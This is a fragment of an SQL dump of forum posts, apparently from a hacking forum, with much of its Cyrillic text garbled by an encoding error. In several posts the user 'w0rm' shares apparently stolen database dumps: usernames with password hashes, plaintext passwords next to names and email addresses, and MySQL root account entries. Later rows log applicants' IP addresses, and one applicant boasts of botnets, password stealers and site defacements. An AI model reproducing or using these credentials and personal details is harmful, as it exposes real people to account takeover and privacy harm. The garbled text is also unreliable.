\'0d5f1ae6e61c87ff73a8dbcdec28f901\', \'0d5f1ae6e61c87ff73a8dbcdec28f901\', \'2007-08-13 18:59:52\'),\r\n(36, \'marish\', \'1ce3a4ed2e2ceebd3c1eb3064d247f59\', \'\', \'2007-09-07 11:04:33\'),\r\n(37, \'Moderator10\', \'749a1b560e0f8e180f75552215f94b88\', \'\', \'2007-10-02 11:36:43\'),\r\n(40, \'cover\', \'1fe5b4c3e1819c0124c20a304d2a5503\', \'\', \'2009-10-26 18:32:32\'),\r\n(39, \'sixonic\', \'fdd2e7a1e01f9d80b8acbd6afeb92764\', \'\', \'2007-10-26 10:19:29\'),\r\n(42, \'svetlana\', \'2b5e6d66d27edcca802ee8ce55966dfc\', \'\', \'2008-03-21 10:44:52\'),\r\n(44, \'Vitaly\', \'9caab021b268e833a881414b54b446ae\', \'\', \'2008-07-08 16:50:37\'),\r\n(41, \'softwood\', \'8f544c07e9633a9e44e39078dab8c7b4\', \'\', \'2009-07-22 12:07:22\'),\r\n(43, \'jass\', \'5b4e7a318cc5541d6fe8dd1698344339\', \'5b4e7a318cc5541d6fe8dd1698344339\', \'2008-08-21 14:42:44\'),\r\n(48, \'playadmin\', \'60b013b8462ec85ac93436b73998c831\', \'\', \'2008-07-18 15:25:20\'),\r\n(45, \'Kotos\', \'1d7005a6e39ba5015f5ea924bf23034e\', \'1d7005a6e39ba5015f5ea924bf23034e\', \'2008-07-04 14:25:21\'),\r\n(46, \'lazey \', \'64d299a04e7ab83e8029cca56a300bb4_locked\', \'\', \'2011-04-15 18:11:53\'),\r\n(49, \'pav3741\', \'cf012cbdefeda184938c9e7a2275fafa\', \'\', \'2009-06-22 17:56:17\'),\r\n(47, \'tanya\', \'11135fb6461fbdc91eea2090c19043d3\', \'\', \'0000-00-00 00:00:00\'),\r\n(50, \'nightfall\', \'8c4a9e98cf2c261d046cebdba5eeaa35\', \'\', \'2008-08-13 12:53:46\'),\r\n(51, \'ivaschenko\', \'c7e89dfd0780b4dc28b2588e5c6d723f\', \'c7e89dfd0780b4dc28b2588e5c6d723f\', \'2008-08-13 13:03:52\'),\r\n(52, \'belka\', \'77153487d8aad4598b9ad2dc2b73e0bc\', \'\', \'2009-05-14 12:34:13\'),\r\n(53, \'mpopov\', \'3806fd2591ebd913469b3a9c641fbb5a\', \'\', \'2009-02-20 17:01:18\'),\r\n(54, \'kdobryvecher\', \'90f30bbc3c78fb9427fed979df353d51_locked_\', \'\', \'2010-02-18 12:28:02\'),\r\n(56, \'Dita\', \'5ac7a30784818df26801f4d72e335a8f\', \'\', \'2011-03-10 17:29:21\'),\r\n(55, \'dimam\', \'cd2ba77b6d2a89ef3040a27c1596c944\', \'\', \'2010-02-27 14:35:51\'),\r\n(60, \'musienko\', \'d69f477d82a96f6d3183ec01350d9872\', \'d69f477d82a96f6d3183ec01350d9872\', \'2011-10-17 11:58:36\'),\r\n(58, \'kuharchuk\', \'7c989bafe7a08b89c0a11e9ce21fc113\', \'\', \'2010-08-03 09:59:53\'),\r\n(57, \'anet\', \'37eef497a59874b8cc2cb15acc0692ea\', \'\', \'2009-04-24 11:26:06\'),\r\n(59, \'Galina\', \'b0c0a814e3c0e68da4df1f2c816ce265\', \'\', \'2009-11-04 11:04:00\'),\r\n(62, \'Ira\', \'7207862f7579d3e30ec0b5c1c6506700\', \'\', \'0000-00-00 00:00:00\'),\r\n(61, \'golik\', \'f2c7e6883067373205a10604cc878d34\', \'\', \'2012-01-22 20:36:08\'),\r\n(64, \'t-oksana\', \'c61183364bbb3a54fe8f95036a04ac5b\', \'\', \'2014-04-03 06:18:04\'),\r\n(63, \'m.adamchuk\', \'7d9f2cfa6c435f3f32712179bb5587ab\', \'\', \'2009-10-21 13:26:50\'),\r\n(65, \'svoloch\', \'1fe5b4c3e1819c0124c20a304d2a5503\', \'\', \'2011-02-10 16:36:44\'),\r\n(66, \'furlet\', \'cf392b4711b78b6bff7fa4f0e0887754\', \'cf392b4711b78b6bff7fa4f0e0887754\', \'2011-06-06 16:30:12\'),\r\n(67, \'Roma\', \'9f71560c432f7657b215840cfd6068fe\', \'\', \'2010-09-09 16:20:14\'),\r\n(69, \'Smorodinova_L\', \'eb2e1832165dc32dccbb6c9fc20ba05e\', \'\', \'2013-02-25 08:12:38\'),\r\n(68, \'anna_seo\', \'6e3b8e8298a1b7c48f941ef1a0da6255\', \'\', \'2012-06-11 14:20:51\'),\r\n(70, \'pashura\', \'b13d27280cd0d8320d46c13d44a1fb81\', \'\', \'2014-08-06 12:22:15\'),\r\n(71, \'xena\', \'d8ffe0099bb7e2c98f8e6e5c37baffa2\', \'\', \'2012-02-17 13:50:31\'),\r\n(72, \'3vil\', \'276d04854e682c9f108aeca1381faf02\', \'\', \'2011-07-14 13:01:10\'),\r\n(73, \'random\', \'c4ca4238a0b923820dcc509a6f75849b\', \'b77b6e45cd9c2998c6e461a46218847b\', \'2011-09-15 18:17:52\');\r\n[/php]', 1, 0, '50.7.210.37', 0, 2, 0, 0, 0),
(1367, 1227, 1365, 'w0rm', 1, '', 1407430447, 'õщõ ю÷õры:\n[php]\n-- phpMyAdmin SQL Dump\n-- version 2.10.0.2\n-- http://www.phpmyadmin.net\n-- \n-- Ã¥þÑÂÑ‚: 127.0.0.3\n-- ÒрõüѠÑÂþ÷ôðýøÑÂ: ÃÂòó 07 2014 ó., 19:55\n-- ÒõрÑÂøѠÑÂõрòõрð: 5.5.30\n-- ÒõрÑÂøѠPHP: 5.4.13\n\nSET SQL_MODE=\"NO_AUTO_VALUE_ON_ZERO\";\n\n-- \n-- Ñð÷ð ôðýýых: `istat`\n-- \n\n-- --------------------------------------------------------\n\n-- \n-- áтруúтурð тðñûøцы `istat_users`\n-- \n\nCREATE TABLE `istat_users` (\n `ID` int(4) unsigned NOT NULL AUTO_INCREMENT,\n `group_ID` int(4) unsigned NOT NULL DEFAULT \'0\',\n `Login` varchar(255) NOT NULL DEFAULT \'\',\n `Pass` varchar(255) NOT NULL DEFAULT \'\',\n `FIO` varchar(255) NOT NULL DEFAULT \'\',\n `Info` varchar(255) NOT NULL DEFAULT \'\',\n `active` int(1) unsigned NOT NULL DEFAULT \'0\',\n `SiteName` varchar(255) NOT NULL,\n `URL` varchar(255) NOT NULL,\n `pInfo` varchar(255) NOT NULL,\n PRIMARY KEY (`ID`)\n) ENGINE=MyISAM DEFAULT CHARSET=cp1251 AUTO_INCREMENT=14 ;\n\n-- \n-- Ãâ€Ã°Ã¼Ã¿ ôðýýых тðñûøцы `istat_users`\n-- \n\nINSERT INTO `istat_users` (`ID`, `group_ID`, `Login`, `Pass`, `FIO`, `Info`, `active`, `SiteName`, `URL`, `pInfo`) VALUES \n(1, 1, \'Zomb\', \'123456\', \'âðрðúðýúþò áõрóõù\', \'zomb@ukr.net\', 1, \'\', \'\', \'\'),\n(2, 3, \'kryackazyablick\', \'cricaza\', \'áÑÂôрþ îûøÑÂ\', \'syadro@ukr.net\', 1, \'\', \'\', \'\'),\n(3, 1, \'Sulya\', \'123\', \'áуûьöõýúþ ÃÂûõúÑÂðýôр\', \'sulya@kiev.ukr.net\', 0, \'\', \'\', \'\'),\n(4, 4, \'Misha\', \'Bhnkfx\', \'Üøхðøû Øртûðч\', \'mair_1966@ukr.net\', 1, \'\', \'\', \'\'),\n(5, 3, \'Masha\', \'Vfif\', \'ÚþрÑÂðúþòð ÜðрøÑÂ\', \'mariya@kiev.ukr.net\', 1, \'\', \'\', \'\'),\n(6, 5, \'Marina\', \'Vfhbyf\', \'Óуртþòõýúþ Üðрøýð\', \'marinag@kiev.ukr.net\', 0, \'\', \'\', \'\'),\n(7, 3, \'Kira\', \'Bhf\', \'ÚþñыûøýÑÂúðѠØрøýð\', \'\', 0, \'\', \'\', \'\'),\n(8, 3, \'kula\', \'Rekf\', \'Úуûðúþòð ÃÂýтþýøýð\', \'kula@ukr.net\', 1, \'\', \'\', \'\'),\n(9, 3, \'Kovalchuk\', \'z83h5h5\', \'Úþòðûьчуú Øрøýð\', \'ira_belaya@ukr.net\', 1, \'\', \'\', \'\'),\n(11, 2, \'kustov\', \'Fraza.ua\', \'ÚуÑÂтþò Òøтðûøù\', \'kustov@gmail.com\', 1, \'äрð÷ð\', \'http://fraza.ua\', \'Ñðртõр\'),\n(12, 1, \'admin\', \'1234567890\', \'âõÑÂтþòыù ðôüøý\', \'\', 1, \'\', \'\', \'\'),\n(13, 1, \'pav3741\', \'123456\', \'q\', \'\', 1, \'\', \'\', \'\');\n\n[/php]\n\nø÷ üуÑÂúуûð:\n[php]\n-- phpMyAdmin SQL Dump\n-- version 2.10.0.2\n-- http://www.phpmyadmin.net\n-- \n-- Ã¥þÑÂÑ‚: 127.0.0.3\n-- ÒрõüѠÑÂþ÷ôðýøÑÂ: ÃÂòó 07 2014 ó., 19:56\n-- ÒõрÑÂøѠÑÂõрòõрð: 5.5.30\n-- ÒõрÑÂøѠPHP: 5.4.13\n\nSET SQL_MODE=\"NO_AUTO_VALUE_ON_ZERO\";\n\n-- \n-- Ñð÷ð ôðýýых: `mysql`\n-- \n\n-- --------------------------------------------------------\n\n-- \n-- áтруúтурð тðñûøцы `user`\n-- \n\nCREATE TABLE `user` (\n `Host` char(60) COLLATE utf8_bin NOT NULL DEFAULT \'\',\n `User` char(16) COLLATE utf8_bin NOT NULL DEFAULT \'\',\n `Password` char(41) CHARACTER SET latin1 COLLATE latin1_bin NOT NULL DEFAULT \'\',\n `Select_priv` enum(\'N\',\'Y\') CHARACTER SET utf8 NOT NULL DEFAULT \'N\',\n `Insert_priv` enum(\'N\',\'Y\') CHARACTER SET utf8 NOT NULL DEFAULT \'N\',\n `Update_priv` enum(\'N\',\'Y\') CHARACTER SET utf8 NOT NULL DEFAULT \'N\',\n `Delete_priv` enum(\'N\',\'Y\') CHARACTER SET utf8 NOT NULL DEFAULT \'N\',\n `Create_priv` enum(\'N\',\'Y\') CHARACTER SET utf8 NOT NULL DEFAULT \'N\',\n `Drop_priv` enum(\'N\',\'Y\') CHARACTER SET utf8 NOT NULL DEFAULT \'N\',\n `Reload_priv` enum(\'N\',\'Y\') CHARACTER SET utf8 NOT NULL DEFAULT \'N\',\n `Shutdown_priv` enum(\'N\',\'Y\') CHARACTER SET utf8 NOT NULL DEFAULT \'N\',\n `Process_priv` enum(\'N\',\'Y\') CHARACTER SET utf8 NOT NULL DEFAULT \'N\',\n `File_priv` enum(\'N\',\'Y\') CHARACTER SET utf8 NOT NULL DEFAULT \'N\',\n `Grant_priv` enum(\'N\',\'Y\') CHARACTER SET utf8 NOT NULL DEFAULT \'N\',\n `References_priv` enum(\'N\',\'Y\') CHARACTER SET utf8 NOT NULL DEFAULT \'N\',\n `Index_priv` enum(\'N\',\'Y\') CHARACTER SET utf8 NOT NULL DEFAULT \'N\',\n `Alter_priv` enum(\'N\',\'Y\') CHARACTER SET utf8 NOT NULL DEFAULT \'N\',\n `Show_db_priv` enum(\'N\',\'Y\') CHARACTER SET utf8 NOT NULL DEFAULT \'N\',\n `Super_priv` enum(\'N\',\'Y\') CHARACTER SET utf8 NOT NULL DEFAULT \'N\',\n `Create_tmp_table_priv` enum(\'N\',\'Y\') CHARACTER SET utf8 NOT NULL DEFAULT \'N\',\n `Lock_tables_priv` enum(\'N\',\'Y\') CHARACTER SET utf8 NOT NULL DEFAULT \'N\',\n `Execute_priv` enum(\'N\',\'Y\') CHARACTER SET utf8 NOT NULL DEFAULT \'N\',\n `Repl_slave_priv` enum(\'N\',\'Y\') CHARACTER SET utf8 NOT NULL DEFAULT \'N\',\n `Repl_client_priv` enum(\'N\',\'Y\') CHARACTER SET utf8 NOT NULL DEFAULT \'N\',\n `Create_view_priv` enum(\'N\',\'Y\') CHARACTER SET utf8 NOT NULL DEFAULT \'N\',\n `Show_view_priv` enum(\'N\',\'Y\') CHARACTER SET utf8 NOT NULL DEFAULT \'N\',\n `Create_routine_priv` enum(\'N\',\'Y\') CHARACTER SET utf8 NOT NULL DEFAULT \'N\',\n `Alter_routine_priv` enum(\'N\',\'Y\') CHARACTER SET utf8 NOT NULL DEFAULT \'N\',\n `Create_user_priv` enum(\'N\',\'Y\') CHARACTER SET utf8 NOT NULL DEFAULT \'N\',\n `Event_priv` enum(\'N\',\'Y\') CHARACTER SET utf8 NOT NULL DEFAULT \'N\',\n `Trigger_priv` enum(\'N\',\'Y\') CHARACTER SET utf8 NOT NULL DEFAULT \'N\',\n `Create_tablespace_priv` enum(\'N\',\'Y\') CHARACTER SET utf8 NOT NULL DEFAULT \'N\',\n `ssl_type` enum(\'\',\'ANY\',\'X509\',\'SPECIFIED\') CHARACTER SET utf8 NOT NULL DEFAULT \'\',\n `ssl_cipher` blob NOT NULL,\n `x509_issuer` blob NOT NULL,\n `x509_subject` blob NOT NULL,\n `max_questions` int(11) unsigned NOT NULL DEFAULT \'0\',\n `max_updates` int(11) unsigned NOT NULL DEFAULT \'0\',\n `max_connections` int(11) unsigned NOT NULL DEFAULT \'0\',\n `max_user_connections` int(11) unsigned NOT NULL DEFAULT \'0\',\n `plugin` char(64) COLLATE utf8_bin DEFAULT \'\',\n `authentication_string` text COLLATE utf8_bin,\n PRIMARY KEY (`Host`,`User`)\n) ENGINE=MyISAM DEFAULT CHARSET=utf8 COLLATE=utf8_bin COMMENT=\'Users and global privileges\';\n\n-- \n-- Ãâ€Ã°Ã¼Ã¿ ôðýýых тðñûøцы `user`\n-- \n\nINSERT INTO `user` (`Host`, `User`, `Password`, `Select_priv`, `Insert_priv`, `Update_priv`, `Delete_priv`, `Create_priv`, `Drop_priv`, `Reload_priv`, `Shutdown_priv`, `Process_priv`, `File_priv`, `Grant_priv`, `References_priv`, `Index_priv`, `Alter_priv`, `Show_db_priv`, `Super_priv`, `Create_tmp_table_priv`, `Lock_tables_priv`, `Execute_priv`, `Repl_slave_priv`, `Repl_client_priv`, `Create_view_priv`, `Show_view_priv`, `Create_routine_priv`, `Alter_routine_priv`, `Create_user_priv`, `Event_priv`, `Trigger_priv`, `Create_tablespace_priv`, `ssl_type`, `ssl_cipher`, `x509_issuer`, `x509_subject`, `max_questions`, `max_updates`, `max_connections`, `max_user_connections`, `plugin`, `authentication_string`) VALUES \n(0x6c6f63616c686f7374, 0x726f6f74, \'\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'\', \'\', \'\', \'\', 0, 0, 0, 0, \'\', NULL),\n(0x6e706e65772e756b722e6e6574, 0x726f6f74, \'\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'\', \'\', \'\', \'\', 0, 0, 0, 0, \'\', NULL),\n(0x3132372e302e302e31, 0x726f6f74, \'\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'\', \'\', \'\', \'\', 0, 0, 0, 0, \'\', NULL),\n(0x25, 0x726f6d6d6978, 0x2a33313036364238454546424434333630393342373630453533344542444241344539393146423345, \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'Y\', \'Y\', \'N\', \'N\', \'Y\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'\', \'\', \'\', \'\', 0, 0, 0, 0, \'\', NULL),\n(0x3132372e302e302e32, 0x726f6f74, \'\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'N\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'\', \'\', \'\', \'\', 0, 0, 0, 0, \'\', NULL),\n(0x3132372e302e302e33, 0x726f6f74, \'\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'N\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'Y\', \'\', \'\', \'\', \'\', 0, 0, 0, 0, \'\', NULL),\n(0x3132372e302e302e34, 0x7265706c, 0x2a37393431464232324233373543453633343335394334313646374137413938374246424544334145, \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'Y\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'\', \'\', \'\', \'\', 0, 0, 0, 0, \'\', NULL),\n(0x3132372e302e302e32, 0x7374617473, 0x2a45323643443430363932343334413541423233424242424637453638383141353241334635414341, \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'\', \'\', \'\', \'\', 0, 0, 0, 0, \'\', NULL),\n(0x3132372e302e302e31, 0x7374617473, 0x2a45323643443430363932343334413541423233424242424637453638383141353241334635414341, \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'N\', \'\', \'\', \'\', \'\', 0, 0, 0, 0, \'\', NULL);\n[/php]', 1, 0, '50.7.210.37', 0, 1, 0, 0, 0),
(1368, 1227, 1367, 'w0rm', 1, '', 1407430711, 'Ãâ€Ã¾Ã¼ÃµÃ½Ñ‹ уúр ýõтð úуôð üþóут ÿþôþùтø ÿðрþûø.\n[php]\n-- phpMyAdmin SQL Dump\n-- version 2.10.0.2\n-- http://www.phpmyadmin.net\n-- \n-- Ã¥þÑÂÑ‚: 127.0.0.3\n-- ÒрõüѠÑÂþ÷ôðýøÑÂ: ÃÂòó 07 2014 ó., 19:59\n-- ÒõрÑÂøѠÑÂõрòõрð: 5.5.30\n-- ÒõрÑÂøѠPHP: 5.4.13\n\nSET SQL_MODE=\"NO_AUTO_VALUE_ON_ZERO\";\n\n-- \n-- Ñð÷ð ôðýýых: `stats`\n-- \n\n-- --------------------------------------------------------\n\n-- \n-- áтруúтурð тðñûøцы `bm_cfg`\n-- \n\nCREATE TABLE `bm_cfg` (\n `id` int(10) unsigned NOT NULL,\n `title` varchar(255) CHARACTER SET cp1251 NOT NULL,\n UNIQUE KEY `id` (`id`)\n) ENGINE=MyISAM DEFAULT CHARSET=latin1;\n\n-- \n-- Ãâ€Ã°Ã¼Ã¿ ôðýýых тðñûøцы `bm_cfg`\n-- \n\nINSERT INTO `bm_cfg` (`id`, `title`) VALUES \n(50, \'korrespondent.net\'),\n(12815, \'unian.net\'),\n(86476, \'censor.net.ua\'),\n(153464, \'segodnya.ua\'),\n(16823948, \'lb.ua\'),\n(92303, \'kp.ua\'),\n(182538, \'tsn.ua\'),\n(54, \'comments.ua\'),\n(5272, \'for-ua.com\'),\n(145221, \'focus.ua\'),\n(456, \'pravda.com.ua\'),\n(904, \'mignews.com.ua\'),\n(1084, \'fakty.ua\'),\n(3250, \'zn.ua\'),\n(3636, \'interfax.com.ua\'),\n(5035, \'podrobnosti.com.ua\'),\n(28642, \'donbass.ua\'),\n(43618, \'glavred.info\'),\n(74336, \'from-ua.com\'),\n(86157, \'mycityua.com\'),\n(88905, \'utro.ru\'),\n(90800, \'vlasti.net\'),\n(105335, \'ura-inform.com\'),\n(108243, \'fraza.ua\'),\n(125856, \'aif.ua\'),\n(128960, \'gazeta.ua\'),\n(148481, \'utro.ua\'),\n(153098, \'versii.com\'),\n(153755, \'dozor.kharkov.ua\'),\n(157547, \'eg.ru\'),\n(169320, \'bagnet.org\'),\n(170887, \'izvestia.com.ua\'),\n(16800182, \'golosua.com\'),\n(16808873, \'vsyapravda.com\'),\n(16836484, \'bbc.co.uk\'),\n(16841018, \'glavcom.ua\'),\n(16859779, \'tyzhden.ua\'),\n(16862327, \'profinews.com.ua\'),\n(16873100, \'kyivpost.ua\'),\n(16878311, \'gazetavv.com\'),\n(16881477, \'unn.com.ua\'),\n(101585, \'eizvestia.com\'),\n(87430, \'ukrrudprom.ua\'),\n(16800646, \'minprom.ua\'),\n(16806480, \'glavport.net\'),\n(97911, \'weekly.ua\'),\n(113524, \'kommersant.ua\'),\n(150401, \'epravda.com.ua\'),\n(14885, \'companion.ua\'),\n(119932, \'delo.ua\'),\n(87931, \'ugmk.info\'),\n(16801617, \'ligazakon.ua\'),\n(178914, \'ubr.ua\'),\n(171380, \'kontrakty.ua\'),\n(145856, \'dengi.ua\'),\n(538, \'finance.ua\'),\n(1747, \'liga.net\');\n[/php]\n[php]\n-- phpMyAdmin SQL Dump\n-- version 2.10.0.2\n-- http://www.phpmyadmin.net\n-- \n-- Ã¥þÑÂÑ‚: 127.0.0.3\n-- ÒрõüѠÑÂþ÷ôðýøÑÂ: ÃÂòó 07 2014 ó., 20:00\n-- ÒõрÑÂøѠÑÂõрòõрð: 5.5.30\n-- ÒõрÑÂøѠPHP: 5.4.13\n\nSET SQL_MODE=\"NO_AUTO_VALUE_ON_ZERO\";\n\n-- \n-- Ñð÷ð ôðýýых: `stats`\n-- \n\n-- --------------------------------------------------------\n\n-- \n-- áтруúтурð тðñûøцы `bm_custom_cfg`\n-- \n\nCREATE TABLE `bm_custom_cfg` (\n `id` int(10) unsigned NOT NULL,\n `title` varchar(255) CHARACTER SET cp1251 NOT NULL,\n UNIQUE KEY `id` (`id`)\n) ENGINE=MyISAM DEFAULT CHARSET=latin1;\n\n-- \n-- Ãâ€Ã°Ã¼Ã¿ ôðýýых тðñûøцы `bm_custom_cfg`\n-- \n\nINSERT INTO `bm_custom_cfg` (`id`, `title`) VALUES \n(50, \'korrespondent.net\'),\n(12815, \'unian.net\'),\n(86476, \'censor.net.ua\'),\n(153464, \'segodnya.ua\'),\n(16823948, \'lb.ua\'),\n(92303, \'kp.ua\'),\n(182538, \'tsn.ua\'),\n(54, \'comments.ua\'),\n(5272, \'forum.ua\'),\n(145221, \'fokus.ua\'),\n(456, \'pravda.com.ua\');\n[/php]', 1, 0, '50.7.210.37', 0, 1, 0, 0, 0),
(1369, 1234, 0, 'w0rm', 1, 'ßõрõõ÷ô', 1407454152, 'ÿþ÷ôрðòÃȄÂÑŽ òÑÂõх, üы ÿõрõõхðûø ýð ýþòыù ÑÂõрòõр, ñþûõõ ôôþѠýðü ýõ ÑÂтрðшõý)', 1, 0, '46.146.211.11', 0, 1, 0, 0, 0),
(1370, 1234, 1369, 'syslink', 13, '', 1407456299, 'good work)', 1, 0, '31.7.58.98', 0, 1, 0, 0, 0),
(1371, 1235, 0, 'Invite', 2, 'New invite', 1407456339, '[b]Name[/b]: Nickname\n [b]Age[/b]: \n [b]ICQ/Jabber[/b]: ICQ/Jabber\n [b]e-mail[/b]: Email\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\r\n .', 1, 0, '46.146.211.11', 0, 1, 0, 0, 0),
(1372, 1236, 0, 'Invite', 2, 'New invite', 1407456467, '[b]Name[/b]: Nickname\n [b]Age[/b]: \n [b]ICQ/Jabber[/b]: ICQ/Jabber\n [b]e-mail[/b]: Email\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\r\n .', 1, 0, '46.146.211.11', 0, 1, 0, 0, 0),
(1373, 1237, 0, 'Invite', 2, 'New invite', 1407456553, '[b]Name[/b]: Nickname\n [b]Age[/b]: \n [b]ICQ/Jabber[/b]: ICQ/Jabber\n [b]e-mail[/b]: Email\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\r\n .', 1, 0, '46.146.211.11', 0, 1, 0, 0, 0),
(1376, 1239, 0, 'Invite', 2, 'New invite', 1407460952, '[b]Name[/b]: Nickname\n [b]Age[/b]: \n [b]ICQ/Jabber[/b]: ICQ/Jabber\n [b]e-mail[/b]: Email\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\r\n .\n [b]ip[/b]: 37.220.1.21.', 1, 0, '', 0, 1, 0, 0, 0),
(1377, 1240, 0, 'Invite', 2, 'New invite', 1407461248, '[b]Name[/b]: Nickname\n [b]ip[/b]: 37.220.1.21\n [b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n [b]ICQ/Jabber[/b]: ICQ/Jabber\n [b]e-mail[/b]: Email\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\r\n .', 1, 0, '', 0, 1, 0, 0, 0),
(1378, 1241, 0, 'Invite', 2, 'New invite', 1407461315, '[b]Name[/b]: Nickname\n [b]ICQ/Jabber[/b]: ICQ/Jabber\n [b]e-mail[/b]: Email\n [b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\r\n .\n \n [b]ip[/b]: 37.220.1.21\n [b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 1, 0, '', 0, 1, 0, 0, 0),
(1475, 1334, 0, 'Invite', 2, '{$name}', 1407650752, '[SIZE=\'4\'][COLOR=\'Sienna\']Mr.XHat[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: viking@0nl1ne.at\n[b]e-mail[/b]: Mr.XHat@gmail.com\n[b]Info[/b]: Hacking and Anti-Security, vulnerability discovery, exploit development, reverse engineering, penetration testing, social engineering, security mechanisms bypassing, hacked high profile sites, discovered 0days from web/desktop apps, wrote hacktools and more, some exploits, hacktools, hacking tutorials and more, http://ashiyane.org/forums/member.php?1068630-Mr-XHat,\r\nhttps://darkode.com/profile.php?mode=viewprofile&u=1489, http://www.zone-h.org/archive/special=1/notifier=Mr.XHat,\r\nhttp://www.exploit-db.com/author/?a=5000,\r\nhttp://www.bitdefender.com/security/tajikistan-s-google-yahoo-twitter-amazon-hacked-via-domain-registrar-breach.html,\r\nphp source code auditor, website vuln scanner, ddos botnet, password stealer, advanced fake pages, protocol password crackers, security bypass tools and more and more, i\'m blackhat hacker and enjoy from distributing underground markets and forums for fucking security, i spent more of +7 years experienced on many it fields from anti-security perspectives.\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 46.235.227.70\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5; en-US) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://vk.com/id217207825 | http://vk.com/id217207825 \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
